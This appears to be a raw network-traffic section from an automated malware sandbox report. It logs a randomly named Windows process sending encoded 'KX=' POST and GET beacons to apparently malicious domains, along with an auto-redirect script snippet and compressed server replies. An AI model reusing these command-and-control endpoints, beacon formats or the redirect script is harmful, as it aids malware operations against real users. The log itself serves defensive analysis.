                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                  Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.849743156.232.181.155802648C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 14, 2024 13:50:43.610299110 CET785OUTPOST /abgi/ HTTP/1.1
                                                  Host: www.5tuohbpzyj9.buzz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.5tuohbpzyj9.buzz
                                                  Content-Length: 203
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.5tuohbpzyj9.buzz/abgi/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 47 71 45 39 64 77 56 65 7a 49 48 62 35 61 4d 6c 59 75 6d 48 52 4e 77 34 34 75 5a 46 4e 69 32 61 53 58 66 52 6a 35 35 36 6c 2f 4d 46 30 54 31 4a 4a 7a 41 70 32 75 4a 54 48 55 61 59 42 6e 79 51 57 46 4c 66 45 4c 56 59 79 52 42 4f 53 4d 47 51 79 78 4b 6b 4e 2b 4b 61 6f 55 6c 39 48 56 62 71 6d 4e 4a 50 45 31 47 6f 66 59 48 69 33 73 44 73 72 43 50 34 56 6d 65 79 47 42 43 49 64 64 75 50 56 42 5a 38 79 77 61 63 6e 4f 35 59 48 75 72 50 38 4d 67 77 58 74 33 34 37 47 63 67 30 6e 53 2b 63 72 55 59 33 67 35 2b 44 46 75 4b 4b 58 62 6e 31 35 47 38 49 51 4a 48 5a 4b 37 61 62 46 6a 2f 68 43 68 67 71 6d 6f 3d
                                                  Data Ascii: KX=GqE9dwVezIHb5aMlYumHRNw44uZFNi2aSXfRj556l/MF0T1JJzAp2uJTHUaYBnyQWFLfELVYyRBOSMGQyxKkN+KaoUl9HVbqmNJPE1GofYHi3sDsrCP4VmeyGBCIdduPVBZ8ywacnO5YHurP8MgwXt347Gcg0nS+crUY3g5+DFuKKXbn15G8IQJHZK7abFj/hChgqmo=


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.849749156.232.181.155802648C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 14, 2024 13:50:46.267218113 CET805OUTPOST /abgi/ HTTP/1.1
                                                  Host: www.5tuohbpzyj9.buzz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.5tuohbpzyj9.buzz
                                                  Content-Length: 223
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.5tuohbpzyj9.buzz/abgi/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 47 71 45 39 64 77 56 65 7a 49 48 62 35 36 38 6c 4c 66 6d 48 46 64 77 37 39 75 5a 46 44 43 33 52 53 58 44 52 6a 37 49 39 6c 73 34 46 33 32 5a 4a 4b 79 41 70 6c 65 4a 54 54 45 62 53 4d 48 7a 65 57 46 48 58 45 4a 42 59 79 56 52 4f 53 4e 32 51 79 43 53 6e 50 75 4b 59 75 55 6c 37 49 31 62 71 6d 4e 4a 50 45 78 57 43 66 59 50 69 77 63 54 73 6f 6a 50 6e 59 47 65 74 58 42 43 49 5a 64 75 4c 56 42 5a 65 79 31 79 36 6e 4d 42 59 48 75 37 50 79 34 55 2f 5a 64 33 69 6c 32 63 2b 79 6e 6a 47 62 5a 39 35 70 44 70 76 41 6e 65 4f 43 42 71 4e 76 62 4f 36 4c 51 68 73 5a 4a 54 73 65 79 2b 58 37 68 78 51 30 78 39 45 54 53 43 73 4a 69 46 72 70 63 58 73 42 32 31 4c 62 77 61 74
                                                  Data Ascii: KX=GqE9dwVezIHb568lLfmHFdw79uZFDC3RSXDRj7I9ls4F32ZJKyApleJTTEbSMHzeWFHXEJBYyVROSN2QyCSnPuKYuUl7I1bqmNJPExWCfYPiwcTsojPnYGetXBCIZduLVBZey1y6nMBYHu7Py4U/Zd3il2c+ynjGbZ95pDpvAneOCBqNvbO6LQhsZJTsey+X7hxQ0x9ETSCsJiFrpcXsB21Lbwat


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.849755156.232.181.155802648C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 14, 2024 13:50:48.922327995 CET1822OUTPOST /abgi/ HTTP/1.1
                                                  Host: www.5tuohbpzyj9.buzz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.5tuohbpzyj9.buzz
                                                  Content-Length: 1239
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.5tuohbpzyj9.buzz/abgi/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 47 71 45 39 64 77 56 65 7a 49 48 62 35 36 38 6c 4c 66 6d 48 46 64 77 37 39 75 5a 46 44 43 33 52 53 58 44 52 6a 37 49 39 6c 73 67 46 33 45 52 4a 49 52 59 70 30 75 4a 54 51 45 62 54 4d 48 79 43 57 46 76 74 45 4a 4e 6d 79 54 4e 4f 54 76 4f 51 30 7a 53 6e 46 75 4b 59 6a 30 6c 2b 48 56 62 2f 6d 4f 78 44 45 31 79 43 66 59 50 69 77 65 62 73 38 69 50 6e 61 47 65 79 47 42 43 55 64 64 75 7a 56 42 42 6b 79 31 2b 4d 6b 39 68 59 45 50 4c 50 2f 72 38 2f 62 39 33 6b 6b 32 64 74 79 6e 76 5a 62 5a 51 47 70 41 31 46 41 6b 4f 4f 53 32 44 67 31 61 32 5a 56 79 30 62 55 49 48 4a 54 42 4b 4a 38 51 4e 7a 6f 6a 35 4d 59 30 53 30 45 68 5a 4b 72 4d 44 68 51 6a 74 51 62 48 2f 66 55 54 74 64 51 6c 4c 76 6c 75 63 63 6b 75 6f 41 70 62 4a 4e 79 42 31 2f 2f 74 7a 32 45 7a 72 4c 77 78 39 6d 6c 56 6f 52 34 38 76 34 66 51 4b 55 35 46 6d 38 67 66 65 6b 41 4b 4a 52 53 74 5a 48 65 4c 55 6d 46 53 2f 65 6b 72 6a 4a 7a 39 70 48 76 70 39 59 73 58 4b 52 79 39 74 39 36 4a 4e 70 42 4d 34 53 33 33 30 45 39 45 65 61 45 42 55 4e 68 36 79 [TRUNCATED]
                                                  Data Ascii: KX=GqE9dwVezIHb568lLfmHFdw79uZFDC3RSXDRj7I9lsgF3ERJIRYp0uJTQEbTMHyCWFvtEJNmyTNOTvOQ0zSnFuKYj0l+HVb/mOxDE1yCfYPiwebs8iPnaGeyGBCUdduzVBBky1+Mk9hYEPLP/r8/b93kk2dtynvZbZQGpA1FAkOOS2Dg1a2ZVy0bUIHJTBKJ8QNzoj5MY0S0EhZKrMDhQjtQbH/fUTtdQlLvlucckuoApbJNyB1//tz2EzrLwx9mlVoR48v4fQKU5Fm8gfekAKJRStZHeLUmFS/ekrjJz9pHvp9YsXKRy9t96JNpBM4S330E9EeaEBUNh6yBhNL+7fNxqnSQ/jim6xMfZS5BbDHBDWKk/BoM+QMGL+Z2NlyPVyOvHlqkm6f3JvCylrIpqs5ukSAYflVr28GCqXeOsPXc9dz02RktgDTgJBU7XTYDJRLmqfbFM8FMvqnTBV/V4WxeyhjJBHa8esCONhgqooqWPmH0/d1Ol4uSk0IQrvhXQkvzlnsyQg/zgGf2tXDPvSI+nIvLbIaB/mdN8Kg7qEuUnaG+by1AJBNTTOc0ySNDp6vOG4WolvJRiPVyzihTTR4gkpqxRPcI7lDSIhrJ6+y8ivoLM30AlVDi4RpqT9JRqBXweDk28JXe+MmYaf4uqJDmQKO4cQYqb3fNCvK+AesmLA+d1gwzLpHyatBIfdcCPpJLRmO1uj8l3YgDJlvBLWZBeMMSF4jmg7I7/0Oi9u+Bb2ZCJMuLWAYgXuCkDboI3YMYLnBueyV/f1S3IOXRkBmPrJyvQx5z6TWHyPKP0ODddqLUgDJtfFVfcxnmDUsxeZ0tsaXHZM0/ryNnpYZVxZxQ6ltu7nMk2C9dFl3MnQmJJEmAT4U0lYkdJvQkCtY+AMebGzmSP7Zq3On7yqRgK04wyL1xcKF2GH6Co8eusraDFveus+alq6/8GzKoc7SA02MuXLhaZFK7RuP2lPQeyBDYdi/KxHjtSFvLX7gQetNbcqpZ4 [TRUNCATED]


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.849761156.232.181.155802648C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 14, 2024 13:50:51.575658083 CET528OUTGET /abgi/?KX=LosdeFxQ6b3v/d4SJ/OcJ/MY+PVZKDXZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flNtflpkpcb0CVjulSXUCscL7c5c6O3wfheXeqQy3IVMD/Pg==&2VqtG=K0rLevU0Wh5tIJEp HTTP/1.1
                                                  Host: www.5tuohbpzyj9.buzz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.5
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Dec 14, 2024 13:50:53.265980005 CET709INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Sat, 14 Dec 2024 12:50:52 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 566
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.849777185.27.134.206802648C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 14, 2024 13:50:58.923146009 CET797OUTPOST /4d2l/ HTTP/1.1
                                                  Host: www.canadavinreport.site
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.canadavinreport.site
                                                  Content-Length: 203
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.canadavinreport.site/4d2l/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 55 45 70 4a 2b 38 42 77 62 64 33 52 52 4e 55 58 69 68 49 4b 6c 6d 77 73 54 70 65 75 49 77 4a 6c 37 39 4d 2f 4e 2b 34 42 42 4b 4c 38 30 4b 48 54 48 63 4d 70 36 6c 50 46 51 51 6c 69 46 72 75 37 70 77 61 32 71 67 4b 77 6b 33 5a 38 5a 54 50 66 39 74 78 4d 59 5a 30 34 32 4f 4c 52 62 55 64 56 74 58 74 59 4b 62 64 51 37 48 7a 38 64 71 6c 4c 75 2b 39 71 39 56 33 6c 75 59 50 6d 65 75 67 4c 69 69 76 32 6f 73 51 59 71 31 4e 41 55 54 30 64 63 37 6c 4c 66 79 61 67 69 75 41 53 6c 4b 46 5a 48 30 53 41 6d 75 61 49 53 53 39 39 38 32 6f 36 36 6d 47 75 33 52 49 38 53 33 74 43 5a 58 55 41 2b 77 77 65 63 4a 51 3d
                                                  Data Ascii: KX=UEpJ+8Bwbd3RRNUXihIKlmwsTpeuIwJl79M/N+4BBKL80KHTHcMp6lPFQQliFru7pwa2qgKwk3Z8ZTPf9txMYZ042OLRbUdVtXtYKbdQ7Hz8dqlLu+9q9V3luYPmeugLiiv2osQYq1NAUT0dc7lLfyagiuASlKFZH0SAmuaISS9982o66mGu3RI8S3tCZXUA+wwecJQ=
                                                  Dec 14, 2024 13:51:00.169723034 CET683INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Sat, 14 Dec 2024 12:50:59 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                  Cache-Control: no-cache
                                                  Content-Encoding: br
                                                  Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e f4 13 5e 75 0e 4f ff b9 09 74 ed 42 62 10 e4 94 04 a6 39 e9 a1 56 63 80 9f 54 1c cf 30 19 49 bb 08 fb 0b 8c 9a 56 74 63 a1 7c d3 97 b2 9c 60 e4 2c 3c 03 70 ca c2 e7 77 6d f2 90 89 bc 30 24 51 87 06 41 ae 8c 4d 07 0e 4b da d0 84 13 f2 0f 71 df fe 77 91 78 b2 5b 8f 1c e0 5a 31 f0 f9 4d 0d 24 00 b3 46 cb ba 7e 7e 6e 85 d8 5f fa 7b fa 0f 93 39 c0 f5 7c 2e 77 97 3e 7c 65 98 a7 16 30 a6 0e e2 da b5 cc fb b6 d7 ce f7 89 f5 c1 4b 78 63 3e dd f7 25 8e 71 85 31 f1 2f 2e 14 d0 c0 4b f8 b0 cb d9 90 c8 ff 78 7b 12 00 fa 0f ec 38 63 4a 0a 13 0b 99 24 a9 c9 05 2f 35 cf 58 21 8c 62 22 56 39 26 54 c5 bc 16 65 96 e7 3a b5 d6 96 5c 67 42 e4 a5 88 99 48 59 c9 54 2e 5c 19 37 90 7e 9c 67 69 5e 08 53 30 6d 99 66 85 70 dc 29 96 a6 39 17 32 cb ac 76 2d ae cd 44 4f 1b 5d 01 4c 01 fe fd 5d da c5 12 b0 8f 34 24 b0 f3 d7 f7 1f a1 b1 7a be 9b 2e 3d 4d 53 2a a9 22 c4 c7 35 62 e6 87 d0 ee [TRUNCATED]
                                                  Data Ascii: 1b98 #MhEJ^3pNN57KNn^uOtBb9VcT0IVtc|`,<pwm0$QAMKqwx[Z1M$F~~n_{9|.w>|e0Kxc>%q1/.Kx{8cJ$/5X!b"V9&Te:\gBHYT.\7~gi^S0mfp)92v-DO]L]4$z.=MS*"5b( +PUUv;Gjr"v1FIe\{^brh@/teGHSK$jK#R*T0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.849785185.27.134.206802648C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 14, 2024 13:51:01.750704050 CET817OUTPOST /4d2l/ HTTP/1.1
                                                  Host: www.canadavinreport.site
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.canadavinreport.site
                                                  Content-Length: 223
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.canadavinreport.site/4d2l/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 55 45 70 4a 2b 38 42 77 62 64 33 52 52 70 6f 58 74 67 49 4b 74 6d 77 74 50 5a 65 75 52 67 4a 68 37 39 41 2f 4e 2f 4e 47 42 5a 76 38 31 72 33 54 41 59 59 70 7a 31 50 46 49 67 6c 6e 42 72 75 4f 70 77 57 45 71 68 32 77 6b 7a 78 38 5a 52 58 66 2b 65 70 4e 62 70 30 36 75 2b 4c 54 47 45 64 56 74 58 74 59 4b 62 4a 32 37 48 72 38 64 5a 4e 4c 38 71 70 70 78 31 33 6b 74 59 50 6d 56 4f 67 50 69 69 75 62 6f 6f 51 79 71 32 6c 41 55 53 45 64 62 71 6c 4d 52 43 62 4b 6d 75 41 41 6c 61 63 70 50 6b 57 77 6a 63 36 54 61 52 74 32 35 41 5a 51 67 45 4f 6f 30 52 67 58 53 30 46 30 63 67 4a 6f 6b 54 67 75 43 65 45 49 42 6d 42 39 62 6a 53 50 2b 56 2f 57 2f 44 6f 68 38 35 44 79
                                                  Data Ascii: KX=UEpJ+8Bwbd3RRpoXtgIKtmwtPZeuRgJh79A/N/NGBZv81r3TAYYpz1PFIglnBruOpwWEqh2wkzx8ZRXf+epNbp06u+LTGEdVtXtYKbJ27Hr8dZNL8qppx13ktYPmVOgPiiubooQyq2lAUSEdbqlMRCbKmuAAlacpPkWwjc6TaRt25AZQgEOo0RgXS0F0cgJokTguCeEIBmB9bjSP+V/W/Doh85Dy
                                                  Dec 14, 2024 13:51:02.982692957 CET683INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Sat, 14 Dec 2024 12:51:02 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                  Cache-Control: no-cache
                                                  Content-Encoding: br
                                                  Data Raw: 31 62 39 0d 0a a1 38 1a 00 20 ff cf 99 d3 ca 23 4d 9e 68 07 45 ef 9b d6 a7 dc 96 4a bd 5e 33 70 4e d4 89 4e 35 b2 c1 37 4b 4e 1c f0 84 cb a3 6e f4 13 5e 75 0e 4f ff b9 09 74 ed 42 62 10 e4 94 04 a6 39 e9 a1 56 63 80 9f 54 1c cf 30 19 49 bb 08 fb 0b 8c 9a 56 74 63 a1 7c d3 97 b2 9c 60 e4 2c 3c 03 70 ca c2 e7 77 6d f2 90 89 bc 30 24 51 87 06 41 ae 8c 4d 07 0e 4b da d0 84 13 f2 0f 71 df fe 77 91 78 b2 5b 8f 1c e0 5a 31 f0 f9 4d 0d 24 00 b3 46 cb ba 7e 7e 6e 85 d8 5f fa 7b fa 0f 93 39 c0 f5 7c 2e 77 97 3e 7c 65 98 a7 16 30 a6 0e e2 da b5 cc fb b6 d7 ce f7 89 f5 c1 4b 78 63 3e dd f7 25 8e 71 85 31 f1 2f 2e 14 d0 c0 4b f8 b0 cb d9 90 c8 ff 78 7b 12 00 fa 0f ec 38 63 4a 0a 13 0b 99 24 a9 c9 05 2f 35 cf 58 21 8c 62 22 56 39 26 54 c5 bc 16 65 96 e7 3a b5 d6 96 5c 67 42 e4 a5 88 99 48 59 c9 54 2e 5c 19 37 90 7e 9c 67 69 5e 08 53 30 6d 99 66 85 70 dc 29 96 a6 39 17 32 cb ac 76 2d ae cd 44 4f 1b 5d 01 4c 01 fe fd 5d da c5 12 b0 8f 34 24 b0 f3 d7 f7 1f a1 b1 7a be 9b 2e 3d 4d 53 2a a9 22 c4 c7 35 62 e6 87 d0 ee [TRUNCATED]
                                                  Data Ascii: 1b98 #MhEJ^3pNN57KNn^uOtBb9VcT0IVtc|`,<pwm0$QAMKqwx[Z1M$F~~n_{9|.w>|e0Kxc>%q1/.Kx{8cJ$/5X!b"V9&Te:\gBHYT.\7~gi^S0mfp)92v-DO]L]4$z.=MS*"5b( +PUUv;Gjr"v1FIe\{^brh@/teGHSK$jK#R*T0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.849794185.27.134.206802648C:\Program Files (x86)\InPUrRWWmcfUlFmrtuAcVLmZpBSULfUHRPGmnaQYeGiCc\XDBtzWJieMe.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 14, 2024 13:51:04.411801100 CET1834OUTPOST /4d2l/ HTTP/1.1
                                                  Host: www.canadavinreport.site
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.5
                                                  Origin: http://www.canadavinreport.site
                                                  Content-Length: 1239
                                                  Connection: close
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Referer: http://www.canadavinreport.site/4d2l/
                                                  User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                                                  Data Raw: 4b 58 3d 55 45 70 4a 2b 38 42 77 62 64 33 52 52 70 6f 58 74 67 49 4b 74 6d 77 74 50 5a 65 75 52 67 4a 68 37 39 41 2f 4e 2f 4e 47 42 5a 6e 38 31 5a 76 54 47 36 77 70 68 6c 50 46 57 51 6c 6d 42 72 75 54 70 78 2f 50 71 68 36 2f 6b 31 31 38 59 30 4c 66 32 50 70 4e 4d 5a 30 36 79 4f 4c 4f 62 55 64 63 74 58 39 63 4b 62 5a 32 37 48 72 38 64 63 4a 4c 2f 2b 39 70 33 31 33 6c 75 59 50 69 65 75 67 6a 69 69 33 75 6f 6f 63 49 70 48 46 41 55 79 55 64 64 59 4e 4d 54 69 62 49 71 4f 42 54 6c 61 67 32 50 6b 61 38 6a 59 79 74 61 52 46 32 37 68 6b 33 6b 77 57 33 75 33 34 59 63 57 41 66 54 48 42 50 68 77 49 75 48 65 45 35 48 53 4e 74 52 51 79 70 36 6e 7a 54 68 53 67 6c 75 4d 61 5a 39 56 30 71 49 7a 6a 4e 77 76 5a 55 2f 74 39 6d 64 55 63 77 4d 48 6a 32 69 53 74 6c 73 6c 4d 6f 57 31 44 50 4f 4a 69 50 48 44 6e 6a 65 54 35 67 72 73 31 47 74 74 38 51 4a 33 73 51 2f 61 36 55 79 6d 56 50 74 61 36 75 52 77 4f 7a 33 6c 44 61 38 67 4b 7a 57 42 70 33 74 6a 38 7a 58 46 52 54 39 55 6a 49 72 33 38 6c 46 6e 50 6f 5a 61 78 39 5a 52 7a [TRUNCATED]
                                                  Data Ascii: KX=UEpJ+8Bwbd3RRpoXtgIKtmwtPZeuRgJh79A/N/NGBZn81ZvTG6wphlPFWQlmBruTpx/Pqh6/k118Y0Lf2PpNMZ06yOLObUdctX9cKbZ27Hr8dcJL/+9p313luYPieugjii3uoocIpHFAUyUddYNMTibIqOBTlag2Pka8jYytaRF27hk3kwW3u34YcWAfTHBPhwIuHeE5HSNtRQyp6nzThSgluMaZ9V0qIzjNwvZU/t9mdUcwMHj2iStlslMoW1DPOJiPHDnjeT5grs1Gtt8QJ3sQ/a6UymVPta6uRwOz3lDa8gKzWBp3tj8zXFRT9UjIr38lFnPoZax9ZRzRok0gIFjQbrJMCIYU4eD8OR0UTydfTL66wHjryRUMHhXhhkLpf/8cNnoq4NyqwFYcNKTFhShRsWPMn4alrxHPbV9FPJEL6ZZt2CCnsbANM0MG6bDefLjDkmFuHrLN+GiRdP9vNxQwcSPFM/ye1utISYB8URZfDYzFiSJ+KRiqmeSn6kKjWSUrmTyazVixTr93CWNxsTdvvlD8TGUDpabN0HXhxUvsLIZtgW2cq196unVZvnusRexDwoYmz3gN19oFbWNgITPCCYp99WBtwZjA/N6TZsXVfD61Noe9wSQIdN/NJnxV93wsrpZ4iDQiCQYT04ESjqZuu8L00GydQ/9HKq2YqK7l4wJoynzAryS78Xblx7+UDDK8PeawpAfA9g1YVobOhkOs9eoVi926fv5KrKpF+dM1+7SPjrAG9d0ihbO2Dv90aU+FadSJ1GrrNjUsR7cvkc0TCICrj/auiCDo3G6OXvMx6aChA6ZTw/I8s3T8PR2jo6IkWvDW64rtIrBLaLtSre0eanrDNdyIejnQRcr1Qq4DYpmEWA9Xb955hmmz46jsjymPadHJKNkS+xxEM6NARq9dXioC98auSG2oYtQ1x2LHDNXbqO5z9SqwDcEGdpfMko6Ri8Bsaqn+ZjyEtnTHgjd11R7wcDxUmVir7A/c0P8XrVQaD [TRUNCATED]
                                                  Dec 14, 2024 13:51:05.643049955 CET683INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Sat, 14 Dec 2024 12:51:05 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                  Cache-Control: no-cache
                                                  Content-Encoding: br
